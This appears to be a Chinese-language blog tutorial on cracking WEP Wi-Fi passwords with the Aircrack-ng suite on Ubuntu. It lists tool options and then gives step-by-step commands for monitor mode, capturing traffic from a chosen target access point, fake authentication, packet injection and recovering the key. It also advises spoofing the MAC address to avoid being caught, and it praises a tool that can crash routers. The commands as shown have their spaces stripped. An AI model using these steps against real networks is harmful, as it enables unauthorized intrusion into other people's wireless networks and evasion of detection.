無線破解 -->無線還安全嗎?

由於在Windows環境下不能如Linux環境下直接調用無線網卡,所以需要使用其他工具將無線網卡載入,以便攻擊工具能夠正常使用,在無線攻擊套裝Aircrack-ng的Windows版本下內置這樣的工具,就是Aircrack-ng,下面給大家介紹一下在Ubuntu下Aircrack-ng工具包的使用。

 

安裝:$sudoapt-getinstallaircrack-ng

Aircrack-ng無線破解工具包有很多工具,用到的工具主要有以下幾個:

airmon-ng處理網卡工作模式

airodump-ng抓包

aircrack-ng破解

aireplay-ng發包,干擾

1)airmon-ng

啓動無線網卡進入Monitor模式,

useage:airmon-ng<start|stop|check><interface>[channel]

<start|stop|check>:啓動,停止,檢測

<interface>:指定無線網卡

[channel]:監聽頻道,現代大多數無線路由默認是6,隨便掃描一下都是這個頻道,網管們應該換換了

2)airodump-ng

抓包工具,我最喜歡用的,詳細用法如下:

usage:airodump-ng<options><interface>[,<interface>,...]

Options:

–ivs:僅將抓取信息保存爲.ivs

–write<prefix>:保存爲指定日文件名,我一般用這個,尤其是多個網絡時,指定了也好區分

–beacons:保存所有的beacons,默認情況況下是丟棄那些無用的數據包的

Filteroptions:

–encrypt<suite>:使用密碼序列過濾AP

–netmask<netmask>:使用掩碼過濾AP

–bssid<bssid>:使用bssid過濾AP

-a:過濾無關的客戶端

–help:顯示使用方法,翻譯到這裏,感覺還是英文的貼切一點,建議讀原文

3)aireplay-ng

搞破壞的工具,注意殺傷力很大,甚至可以損壞劣質的AP設備(小內存的路由器可能會重啓,或者徹底被破壞掉),我很喜歡這個東西,相信你也會喜歡的,使用時注意分寸.

usage:aireplay-ng<options><replayinterface>

Filteroptions:

-bbssid:AP的MAC

-ddmac:目標的MAC

-ssmac:來源的MAC

-mlen:最小包長度

-nlen:最大包長度

-D:禁用AP發現功能

Replayoptions:

-xnbpps:每秒包數量

-pfctrl:框架設定(hex)

-abssid:設置AP的mac

-cdmac:設置目標的MAC

-hsmac:設置來源的mac

-gvalue:改變環緩存大小(默認8)

Fakeauthattackoptions:

-eessid:設置目標AP的SSID

-onpckts:每秒爆破的包數量(0自動,默認1)

-qsec:存活時間秒

-yprga:共享可信的key流

–help:顯示這個幫助,這部分是全部依照我的使用來翻譯,沒有完全準確的翻譯,主要對付那些不給出作者就引用的人,鄙視抄襲.

4)aircrack-ng

破解KEY,漫長的過程.漫不漫長取決於兩個方面:一是網管的聰明程度(能否設置出複雜的密碼),二是電腦的速度.

usage:aircrack-ng[options]<.cap/.ivsfile(s)>

Commonoptions:

-a<amode>:暴破(1/WEP,2/WPA-PSK)

-e<essid>:選擇essid爲目標

-b<bssid>:選擇ap的mac爲目標,就是破解識別的關鍵字

-q:使用安靜模式,無數出模式

-C<macs>:將所有的AP合併爲一個虛擬的

–help:顯示這個幫助

就WEP破解說明,步驟:

步驟:

1.修改無線網卡狀態:先down掉

2.僞造無線網卡的MAC地址:安全起見,減少被抓到的可能

3.修改網卡工作模式:進入Monitor狀態,會產生一個虛擬的網卡

4.修改無線網卡狀態:up

5.查看網絡狀態,記錄下AP的MAC和本機的MAC,確定攻擊目標

6.監聽抓包:生成.cap或.ivs

7.干擾無線網絡:截取無線數據包,發送垃圾數據包,用來獲得更多的有效數據包

8.破解.cap或.ivs,獲得WEP密碼,完成破解

具體步驟:

1、首先確定是否有wlan0的無線網卡端口,ifconfig即可知道。若存在終端輸入sudoairmon-ngstartwlan0啓動無線網卡的監控模式。

 

2、在終端中輸入sudoairodump-ngmon0,啓動監控模式後無線端口是mon0(如果啓動多次會按數字累加),看看有哪些採用wep加密的AP在線,然後按ctrl+c退出,保留終端。

3、另開一個終端,輸入sudoairodump-ng-c6--bssidAP'sMAC-wwepmon0(-c後面的6爲AP工作頻道,--bissid後面的AP'sMAC是要欲破解AP的MAC地址,-w後的wep的是抓下來的數據包DATA保存的文件名(可以隨便取名),然後回車開始抓包。

4、再另開一個終端,輸入sudoaireplay-ng-10-eESSID-aAP'sMAC-hMyMACmon0與AP建立虛擬連接(-h後面跟着的MyMAC是自己的無線網卡的MAC地址)

這裏以之前探測到的ESSID爲P2P的爲例。

5、建立虛擬連接成功後,輸入sudoaireplay-ng-2-F-p0841-cff:ff:ff:ff:ff:ff-bAP'sMAC-hMyMACmon0進行注入,現在步驟3中數據包應該不斷增長。

 

6、收集有5000個以上的DATA之後,另開一個終端,輸入sudoaircrack-ngwep*.cap進行解密(如果沒算出來的話,繼續等,Ubuntuaircrack-ng會在DATA每增加多5000個之後就自動再運行,直到算出密碼爲至)

7、破解出密碼後在終端中輸入sudoairmon-ngstopmon0關閉監控模式,不然無線網卡會一直向剛剛的AP進行注入的,用ctrl+c退出或者直接關閉終端都是不行的,除非重新啓動電腦。

8、如果沒有出現意外,你應該會很高興的看到KEYFOUND!

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章